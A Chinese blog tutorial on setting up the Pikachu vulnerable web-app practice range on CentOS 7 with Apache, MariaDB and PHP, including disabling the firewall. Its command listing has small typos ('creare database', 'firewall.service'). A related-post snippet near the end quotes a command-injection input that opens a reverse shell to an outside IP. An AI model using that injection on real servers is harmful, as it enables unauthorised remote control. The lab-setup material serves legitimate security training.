Linux搭建pikachu靶场(CentOS7)

已于 2024-02-23 15:48:53 修改
阅读量1.1k 收藏 17
点赞数 26
文章标签: linux 安全 centos
于 2024-02-23 15:48:09 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mashiro_hibiki/article/details/136257932
版权

pikachu靶场介绍

pikachu是一个带有漏洞的Web应用系统,它适合网安新手入门使用,这里包含了几种常见的web安全漏洞,如下:

环境准备

我们需要在CentOS中准备搭建pikachu靶场所需的环境,这里使用LAMP web服务套件(Linux、Apache、MySQL、PHP)来搭建。

安装Apache

首先切换到root用户,使用以下命令并输入创建虚拟机时设置的root密码,如果已经是root权限则无需切换。

su root #切换为root

使用yum指令安装Apache,Apache的服务名是"httpd"。

yum -y install httpd #安装Apache

安装完成后,启动Apache服务并将其设置为自启动。

systemctl start httpd.service #启动apache服务 
systemctl enable httpd.service #自启动

我们可以使用以下指令查看Apache是否正常运行。

systemctl status httpd.service # 查看Apache状态

安装MariaDB数据库

MariaDB数据库是MySQL的一个分支,完全兼容MySQL,包括API和命令行,使之能轻松成为MySQL的代替品;并且CentOS中有现成的MariaDB的yum源,无需去网上下载MySQL安装包。

yum -y install mariadb-server mariadb #安装数据库

安装完成后,启动MariaDB并设置自启动。

systemctl start mariadb #启动mariadb数据库 
systemctl enable mariadb.service #设置自启动

随后我们进入MariaDB中,创建之后搭建pikachu靶场需要的数据库,刚安装的MariaDB的root密码默认为空,在输入密码处直接回车即可。

mysql -u root -p #进入MariaDB
creare database pikachu; #创建pikachu数据库
exit; #退出数据库

安装php

pikachu靶场是基于PHP环境搭建的,所以我们需要安装它所需的php环境,安装完成后,重启Apache服务。

yum -y install php php-mysql #安装php
systemctl restart httpd.service #重启httpd

到这里为止lamp环境就算是全部安装完成了,随后我们就可以进行pikachu的靶场搭建了。

这里建议大家使用VMware的快照功能,保存相应数据在某个时间点(拷贝开始的时间点)的映像,后续若有操作出错可以随时恢复到之前的状态。

pikachu靶场搭建

下载pikachu靶场

首先我们进入/var/www/html目录下,该目录用于存放网站文件,使用git命令下载pikachu源码,CentOS一般自带git工具,没有的话可以先下载git工;也可以手动下载pikachu源码然后将其拖入html目录

cd /var/www/html #进入html目录
yum -y install git #下载git
git clone https://github.com/zhuifengshaonianhanlu/pikachu.git #下载pikachu源码

配置pikachu靶场

使用vi或vim修改pikachu的配置文件/var/www/html/pikachu/inc/config.inc.php,将数据库信息修改成之前配置的MariaDB的信息

vim /var/www/html/pikachu/inc/config.inc.php #编辑pikachu配置文件

使用方向键将光标移到要修改的位置,按i进入编辑模式进行修改,修改完成后按":wq!"保存,如果前面都是默认配置,这里是无需进行修改的。

修改完成后,重启Apache服务,关闭虚拟机防火墙并设置不自启,使用ifconfig指令查看虚拟机的ip

systemctl restart httpd.service #重启Apache
systemctl stop firewall.service #关闭防火墙
systemctl disable firewall.service #防火墙关闭自启
ifconfig #查看IP

在浏览器上输入http://虚拟机IP/pikachu就可以访问pikachu靶场了。

微信公众号二维码

扫一扫关注CatalyzeSec公众号

我们一起来从零开始学习网络安全

CatalyzeSec
关注
  • 26
    点赞
  • 17
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Linux搭建pikachu靶场(以centos为例)_linux apache 部署pikachu项目
2401_83946570的博客
04-11 309
(img-xdMAGADt-1712846492923)]的MySQL数据库,我们需要手动创建它。Pikachu靶场需要一个名为。并且后续会持续更新**
pikachu靶场全部通关.pdf
08-16
由于在有道云写的,不好发博客,只能这样子,个人结合B站视频,总结
web渗透教程1:pikachu靶场搭建
11-17
带你手把手搭建pikachu靶场环境
2024年最全liunx环境下pikachu靶场搭建_linux apache 部署pikachu项目(1),2024年最新从Linux运维语言到AIDL使用与原理讲解
最新发布
m0_60750088的博客
05-04 907
/将root修改为连接mysql的密码,如果改了还是连接不上,请先手动连接下你的数据库,确保数据库服务没问题在说!mysql>ALTER USER ‘root’@‘localhost’ IDENTIFIED WITH mysql_native_password BY ‘密码’;
Linux搭建pikachu靶场(以centos为例)
weixin_44681307的博客
08-03 3083
Pikachu是一个使用PHP语言编写的Web漏洞测试靶场。修改Pikachu靶场的配置文件,将数据库信息更新为你的实际数据库信息。首先,需要在CentOS 7服务器上安装LAMP堆栈。替换为你的MySQL root用户的密码。的MySQL数据库,我们需要手动创建它。现在,应该就可以通过在浏览器中输入。Pikachu靶场需要一个名为。访问Pikachu靶场
kali linux使用docker搭建vulhub靶场
qq_52178795的博客
06-28 310
kali linux使用docker搭建vulhub靶场
【渗透测试】Centos7安装Docker搭建Pikachu靶场
fly_enum的博客
01-16 753
Pikachu是一个带有漏洞的Web应用系统,在这里包含了常见的web安全漏洞。如果你是一个Web渗透测试学习人员且正发愁没有合适的靶场进行练习,那么Pikachu可能正合你意
Centos7搭建DVWA和pikachu端口映射无法访问
qq_74568860的博客
03-21 484
端口映射成功之后,sytemctl start docker然后再次在浏览器访问自己的虚拟机ip地址而不是docker0的ip地址。当docker环境搭建好之后,端口映射也成功时,建议多docker run一下端口和systemctl start docker。可以试着将虚拟机重启一下,然后docker run一下端口。然后使用docker ps检查一下端口是否映射成功。
实战案例-Fofa拿下pikachu服务器保姆级别教程(文件上传下载&webshell)
jnszstmei的博客
04-14 1086
输入127.0.0.1 & 1.exe -e cmd 47.109.189.205 5566(47.109.189.205为自己服务器的ip),拿到服务器的控制权
pikachu靶场全通关教程
07-20
这个是刚开始学网络安全渗透的靶场练习心得,分享给大家
pikachu LINUX安装包,
07-14
上传到根目录,解压直接就问访问,里面有教程
pikachu靶场搭建
02-27
pikachu是一个带有漏洞的Web应用系统,在这里包含了常见的web安全漏洞。如果你是一个Web渗透测试学习人员且正发愁没有合适的靶场进行练习,那么pikachu可能正合你意。
web靶场练习(1)-Pikachu安装
ULis的博客
04-10 3862
Pikachu是一个基于php编写的开源web漏洞测试靶场,其界面优雅大方,十分适合漏洞原理的学习,本文将从开局一个碗,搭建Pikachu靶场环境。 Pikachu可以搭建在多种集成环境中,如XAMPP、WAMP,本文靶场依赖环境: CentOS7 Docker PHP+MYSQL step1-安装docker: //1.卸载旧版本doker #yum remove docker docker-common docker-selinux docker-engine //2.安装依赖包 #yu
[ 靶场环境篇 ] pikachu 靶场环境搭建(特别详细)
热门推荐
qq_51577576的博客
12-10 2万+
一 环境准备 1 搭建环境 Windows10 phpstudy pikachu 2 下载链接 Pikachu靶机下载地址: https://github.com/zhuifengshaonianhanlu/pikachu phpstudy集成开发环境: https://www.xp.cn/ 二 安装教程
Kali-Linux系统下SQLi Labs靶场搭建
Senimo
03-20 2829
Kali-Linux系统下SQLi Labs靶场搭建 基础环境: 操作系统:VMware Kali-Linux 3.34.2 数据库:10.3.22-MariaDB-1 Debian buildd-unstable 在终端输入命令: root@kali:~# cd /var/www/html/ root@kali:/var/www/html# git clone https://github.c...
centos7搭建pikachu靶场环境
syh_sss的博客
07-04 1355
在启动的那一步 改为 docker run -d -p 8000:80 pikachu 在浏览器输入 http://192.168.199.138:8000即可
pikachu靶场搭建以及搭建问题
weixin_51334923的博客
10-20 9073
前言 pikachu是一个适合Web渗透测试学习的小白们进行训练的本地靶场,并且已经在github上开源了。 它是一个综合性的靶场: 非常适合新手练习,接下来就简单的看一下它如何在Windows上搭建吧!!! Apache与MySQL环境搭建 然后这边推荐用phpstudy_pro进行Apache以及mysql的环境搭建。 就以Windows系统来进行安装教学,可以省去很多繁琐的步骤!! 小皮面板(phpstudy) - 让天下没有难配的服务器环境! (xp.cn) 打开官网,点击下载,
搭建学习环境(四)——pikachu
baynk的博客
11-12 5811
在完成了之前的环境安装后,此环境就显得特别简单了。从github下下来以后,丢到www环境中,改下连接数据库的配置文件,然后连接环境地址,点初始化环境即可。 0x01 下载地址 下载地址:https://github.com/zhuifengshaonianhanlu/pikachu 下载地址2:https://pan.baidu.com/s/1JpJjLDQF5DXIuxbgmclRbA 提取码...
阿里云服务器配置开发环境第七章:Centos7.3安装nginx以及环境配置
Pikachu的博客
08-06 1858
Nginx是什么?Nginx是一款轻量级Web服务器,也是一款反向代理服务器Nginx能干什么? 可直接支持Rails和PHP的程序 可作为HTTP反向代理服务器 作为负载均衡服务器 作为邮件代理服务器 帮助实现前端动静分离 Nginx特点 高稳定 高性能 资源占用少 功能丰富 模块化结构 支持热部署 Nginx的安装 安装gccyum install gcc # 输入gcc -v 查询版本信息,看
pikachu 安装教程 linux
07-28
安装Pikachu靶场的教程如下: 1. 首先,你需要安装XAMPP。你可以从下载地址\[1\]下载XAMPP的安装文件,并按照官方的安装教程进行安装。 2. 将Pikachu项目文件夹放到XAMPP的htdocs目录下。这个目录通常位于lampp/htdocs。 3. 进入Pikachu项目文件夹的inc目录,并修改config.inc.php文件,根据你的需求进行配置。 4. 接下来,你需要安装Docker来搭建Pikachu靶场。你可以按照CentOS 7上安装Docker的教程\[2\]进行操作。 5. 配置Docker后,重新加载配置,可以使用命令systemctl restart docker。 6. 安装git工具,你可以使用命令yum install -y git来安装。 7. 使用git工具拉取Pikachu的源代码,可以使用命令git clone https://github.com/zhuifengshaonianhanlu/pikachu.git。 8. 将Pikachu编译为Docker镜像,并运行Pikachu靶场。 9. 最后,你可以通过访问页面来访问Pikachu靶场。 希望以上步骤对你有帮助! #### 引用[.reference_title] - *1* [pikachu-master靶场 linux系统基于 lampp环境部署](https://blog.csdn.net/qq_39330735/article/details/128769379)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* *3* [Centos7安装Docker搭建Pikachu靶场](https://blog.csdn.net/weixin_46152207/article/details/127401145)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值